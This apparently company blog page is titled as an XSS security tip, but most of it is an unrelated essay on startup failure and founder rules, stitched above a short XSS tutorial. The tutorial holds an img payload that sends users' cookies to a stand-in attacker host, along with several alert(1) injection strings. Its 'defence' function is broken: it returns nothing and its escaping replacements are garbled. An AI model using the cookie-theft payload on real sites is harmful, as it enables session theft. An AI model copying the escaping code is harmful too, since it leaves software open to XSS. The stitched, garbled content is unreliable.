艾銻無限安全提示：跨站攻擊(XSS)及防御

2020-03-10 11:52 作者：admin 瀏覽量：

據(jù)不完全統(tǒng)計,中國有近5000萬家中小微企業(yè),這個數(shù)據(jù)隨著互聯(lián)網(wǎng)的發(fā)展還在持續(xù)增長,但這些企業(yè)的存活率是非常低的,60%的初創(chuàng)企業(yè)活不過1年,30%的初創(chuàng)企業(yè)活不過3年,還有超過9%的企業(yè)只有5年左右的生存期,剩下不到1%的企業(yè)活過5年以上,幸運的可以達到10年,甚至更長一些.
 
為什么中小微企業(yè)的存活率這么低呢? 透過成千上萬的失敗案例,我們總結(jié)了以下五大方面的原因:
 
第一,創(chuàng)業(yè)失敗創(chuàng)始人難辭其咎,我們在學校里是沒有一堂課是教如何創(chuàng)業(yè),如何才能創(chuàng)業(yè)成功,即使現(xiàn)在有很多大學嘗試著在學校開辦一些創(chuàng)業(yè)的課程,也不系統(tǒng),更不專業(yè),因為創(chuàng)業(yè)是一件極其復雜的工作,是需要多項技能的集合以及熟練的運用才有可能應對突如其來的變化,創(chuàng)業(yè)初期就像一艘孤獨的小船面對波濤洶涌的大海,但船長從來都沒有開過任何一艘船駛出過海港,風浪來的時候,只有慌張和恐懼,最后被海水吞沒.
 
第二,創(chuàng)業(yè)失敗是價值觀不統(tǒng)一,方向不一致,團隊不團結(jié),風平浪靜,風和日麗,其實沒什么關系,大家都在享受陽光帶來的美好和快樂,只有遇到風浪,生死攸關或個人利益受到極大沖突時,人性的弱點才會突顯,當每個人只盯著個人得失或眼光短淺時,如果這個時候創(chuàng)始人沒有力挽狂瀾,強大的信念和人格魅力來一統(tǒng)所有人的行動準則,在危機中遲疑,就等于在死神面前跳舞,當年阿里的“中國供應商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當即立斷,我相信也不會有今天阿里世界霸主的地位.
 
第三,創(chuàng)業(yè)失敗是固步自封,看不見高山,如果我們只能看見自己的山最高,沒有走出去,沒有學習的心態(tài),沒有敬畏之心,很快時代就會把我們淘汰,當年的諾基亞,柯達就是最好的例子.無論企業(yè)多大,都要有一顆創(chuàng)業(yè)的心,永遠相信還能做的更好,還可以再創(chuàng)新,還會想出其它的可能性.真正的對手不在外面,而在我們心中,心中無敵,才能無敵于天下.
 
第四,創(chuàng)業(yè)失敗是誤解了”客戶是上帝”,上帝并不是時時都知道自己要什么,我們不能只限于客戶表面的表達就決定了他們的需求,很多企業(yè)死就死在客戶的假需求中,看起來好像是客戶追求的產(chǎn)品,需要的服務,但實際當產(chǎn)品生產(chǎn)出來,當服務送到客戶面前,并沒有真正吸引到客戶的注意,愿意為此而買單,核心本質(zhì)就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會當自己是至高無上的,也不會對品質(zhì)無底限的追求,更不會對服務沒有節(jié)制要求,其實客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢卻要得到更多的意識,他們的只忠誠于更便宜更高的品質(zhì),這一切都是企業(yè)需要認知到的本質(zhì),不然你的”上帝”是不會為你持續(xù)付費的.
 
第五,創(chuàng)業(yè)失敗是講多了人情講少了制度,公司小,三五個人可以不需要任何制度,甚至也不需要任何系統(tǒng),因為那時彼此聯(lián)結(jié)非常深,情感的能量可以喚醒每個人的斗志和決心 ,但當企業(yè)發(fā)展到幾十個人甚至幾百個人時,那種深深的聯(lián)結(jié)感很難在感受到,人性的弱點就會被環(huán)境所喚醒,就會被利益所綁架,就會被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務于人,只有促進發(fā)展的制度,可能激勵人性向善的制度才能長久, 反之亦然.
如果你想想創(chuàng)立一家公司?
如果你是一家剛剛開始創(chuàng)業(yè)的公司?
如果你現(xiàn)在在創(chuàng)業(yè)的過程中遇到了挑戰(zhàn)?
 
結(jié)合上面的五大常見創(chuàng)業(yè)失敗,我們總結(jié)出來了五個可以讓你有更大成功機率的法則,可以讓你活的更久一些,但不保證你一定成功,因為事事變化,因緣和合,萬法無常,只能隨機而變.
 
第一法則:準備自己
創(chuàng)始人需要自我審視,首先要準備好自我犧牲的精神,要做好大海有風暴的思想準備,其次利用一切可以實踐的機會去鍛煉自己的綜合能力,不僅僅相信前輩和書本的聲音,更需要相信實戰(zhàn)后帶來的思考和反思.即要有遠大的理想和抱負,又要有腳踏實地做好每一件事的決心.
 
第二法則:認識自我
創(chuàng)始人要極早的認識自我,想清楚為什么要創(chuàng)業(yè)比創(chuàng)業(yè)更重要,清晰明確的了解自己的價值是什么?什么是自己會堅持的,什么是自己抗拒的,混亂的價值觀就會吸引五花八門的人,企業(yè)內(nèi)部的斗爭都是創(chuàng)始人自己思想的斗爭,初創(chuàng)企業(yè)所呈現(xiàn)出來的一切現(xiàn)象都是創(chuàng)始人內(nèi)在的顯化.當年阿里快速成長,內(nèi)部也出現(xiàn)了一系列的問題,但極其智慧的馬云沒有去解決這些問題,反而把自己關在道觀中整整7天,最后終于想明白了三個問題:我要什么,我有什么,我要放棄什么,當他想清晰這三個問題后,并向全公司傳遞出來,最后所有那些紛繁復雜的問題都不解自明.
第三法則:持續(xù)打開
創(chuàng)始人的天花板就是企業(yè)的天花板,企業(yè)無法突破,就是創(chuàng)始人沒有突破自己,突破其實不容易,因為固有的觀念就像萬里長城一樣,非一日之功,是多少個春夏秋冬,嚴寒酷暑的積累和沉淀,這些不是沒有價值,而是幫助過我們創(chuàng)了價值,讓我們來到了今天這一步,但如果我們期望有一個更大的世界,就需要放下它們,放下我們曾經(jīng)一直的堅持和執(zhí)著,打開自己,讓自己接納一個全新的可能性,也許過不了多久,我們又會把這些新的東西奉為圭臬但只要我們還想看到一個更大的可能性,就需要再次打開自己,重新建立認知,我們一生都是在打開和重建過程中,直到生命的終結(jié),又一切回歸原點.
 
第四法則:回歸本質(zhì)
創(chuàng)始人剛開始需要和團隊一起參與戰(zhàn)斗,甚至做具體細節(jié)工作,因為初創(chuàng)需要激情來點燃,而創(chuàng)始人是這個團隊最有激情的一個人,初創(chuàng)團隊需要有人帶動去點燃更大的燃料.當所有團隊和部門走向正軌時,創(chuàng)始人更大的價值是深度的思考,有效的區(qū)分,精神的引領和正確的選擇.
企業(yè)越來越大,事情就會越來越多,如果沒有一個清醒的大腦保持深度的思考,就像讓企業(yè)很多人很忙,忙是一種現(xiàn)象,并不代表有價值,只有透過深度思考發(fā)現(xiàn)事物的本質(zhì),才知道忙什么才是最重要的,
懂得有效的區(qū)分是一個領導者必須掌握的能力, 《尼布爾的祈禱文》說:”上帝，請賜予我平靜，去接受我無法改變的。給予我勇氣，去改變我能改變的，賜我智慧，分辨這兩者的區(qū)別。”只有具備分辨的智慧,才不會讓自己誤入歧途.
創(chuàng)始人要有強大的精神力量,讓所有員工感受到這股力量,因為所有的成功都離不開一個偉大的精神領袖,就像蘋果的喬布斯,微軟的比爾蓋茨和阿里的馬云.
選擇比努力更重要,這句話告訴我們順勢而為的選擇可以讓我們在同樣的努力情況下獲得不同的結(jié)果,如何才能具備這樣明智選擇的能力呢,強大的深度思考能力和有效的區(qū)分能力就可以幫到我們看見正確的選擇.
 
第五法則:創(chuàng)造系統(tǒng)
創(chuàng)始人是人,是人就會有七情六欲,就會有生老病死,就會有悲歡離合,這些人性的因素會讓我們很不穩(wěn)定,但企業(yè)能持久有效的運轉(zhuǎn)一定是在穩(wěn)定的能量下運行,所以不能始終靠人來推動,企業(yè)想要活的久一定是有內(nèi)生的系統(tǒng),只有建立一個自動運轉(zhuǎn)的系統(tǒng)才能保持穩(wěn)定健康的成長. 以上的分享像從管子里看豹，只看見豹身上的一塊花斑，看不到全豹,以此拋磚引玉,希望有更多人可以把自己創(chuàng)業(yè)的經(jīng)歷和經(jīng)驗分享出來,從而讓我們更全面的看見一家企業(yè)怎樣做才能活得久,活的好,活的更有價值.
 
1.艾銻無限安全提示：跨站攻擊(XSS)及防御
 
 
1. XSS的含義
 顧名思義，就是向web頁面或者網(wǎng)站的url添加惡意的script(腳本)代碼，使用戶訪問該網(wǎng)站時，執(zhí)行惡意代碼，從而達到攻擊的目的。
發(fā)生XSS的場景：
1. 網(wǎng)站對用戶的輸入過濾不足，返回給用戶的展示結(jié)果過濾不足。
2. 網(wǎng)站的鏈接地址未經(jīng)過過濾
2. 如何進行攻擊
攻擊種類多種多樣，通常包含如下：
1. 向網(wǎng)站注入腳本，獲取訪問用戶的cookie或者其他會話信息（session information）等私有數(shù)據(jù)
2. 通過注入腳本，將受害者的網(wǎng)頁重定向到攻擊者控制的網(wǎng)頁
3. 通過注入腳本，在用戶的計算機上執(zhí)行其他惡意操作 
3. XSS攻擊分類
 XSS攻擊分為3類： 存儲型（持久型)、反射型（非持久型）、基于DOM型。危害程度遞減。
 存儲型（Stored/Persistent XSS Attacks）  危害程度最大，可能危及所有用戶！
 注入的腳本永久的存儲在目標服務器中。當瀏覽器發(fā)送數(shù)據(jù)請求時，受害者和網(wǎng)站的其他用戶都會再次拿到惡意腳本。
 <示例>：
網(wǎng)站的評論功能
評論提交后，存儲到服務器。所有訪問該網(wǎng)站的用戶自動從服務器拉取到惡意代碼。 
// 在評論框中輸入惡意腳本，提交到服務器
hello<script>廣告等</script>
反射型（Reflected/Non-Persistent XSS Attacks）  一般只危害當前操作用戶 
誘騙用戶點擊惡意鏈接、提交一個被篡改過的表單、瀏覽惡意網(wǎng)站，將惡意代碼注入到訪問者的網(wǎng)站。
web服務器將注入的腳本反射到用戶的瀏覽器，比如通過錯誤信息、查詢結(jié)果等返回瀏覽器。
瀏覽器會執(zhí)行這些惡意代碼，因為它假定響應來自于已經(jīng)交互過的“受信任的”服務器。
<示例>： 
在<img>的url上寫入一個腳本，將本地的cookie通過訪問地址發(fā)送到攻擊者的服務器
<img src=`http://www.fish.com:81?cookie=${document.cookie}` />
基于DOM型（DOM-based XSS Attacks）
攻擊最小，一般通過操作瀏覽器腳本的DOM對象，修改DOM節(jié)點屬性，在DOM節(jié)點插入閉合標簽等，進行攻擊。
<示例>：
通過輸入框給圖片的src賦值，展示圖片
        <input type="text" id="web" /> <button id="add">添加圖片</button>
        <div class="box"></div>
        <script src="/node_modules/jquery/dist/jquery.js"></script>
        <script>
            // 不基于后端， 基于DOM，通過修改屬性、插入內(nèi)容、document.write    
            // 改變結(jié)構(gòu)后造成攻擊
            // 攻擊的內(nèi)容成為xss payload           
            $("#add").on('click', function() {
                // <img src="" onerror="alert(1)" id=""/>
                // " onerror="alert(1)" id="
                // <img src=""><script>alert(1)<\/script>"">   
                // "><script>alert(1)<\/script>"
                $(".box").html(`<img src=${$('#web').val()} />`)
            })
        </script>
 
 4. 如何避免攻擊
所有的攻擊歸根結(jié)底都是該過濾的沒有過濾，該轉(zhuǎn)義的沒有轉(zhuǎn)義。比較完整的避免攻擊方式，需要做以下三步：
1. 客戶端傳遞給服務器時，需要校驗先過濾一下。
   這個方法不能解決問題，因為攻擊者可能會模擬ajax請求。
2. 服務器端再過濾一下
3. 直接在輸出的時候過濾
4. HttpOnly： 防止js讀取cookie后傳遞到第三方
過濾方法：
 
        function encodeHtml(str) {
            str.replace(/&/g, '&').
            replace(/'/g, '"').
            replace(/"/g, ''').
            replace(/</g, '<').replace(/>/g, '>')
        }
 
對于單引號或雙引號，如果輸入內(nèi)容用于后臺或者本地存儲的sql拼接，會導致死循環(huán)等惡意結(jié)果。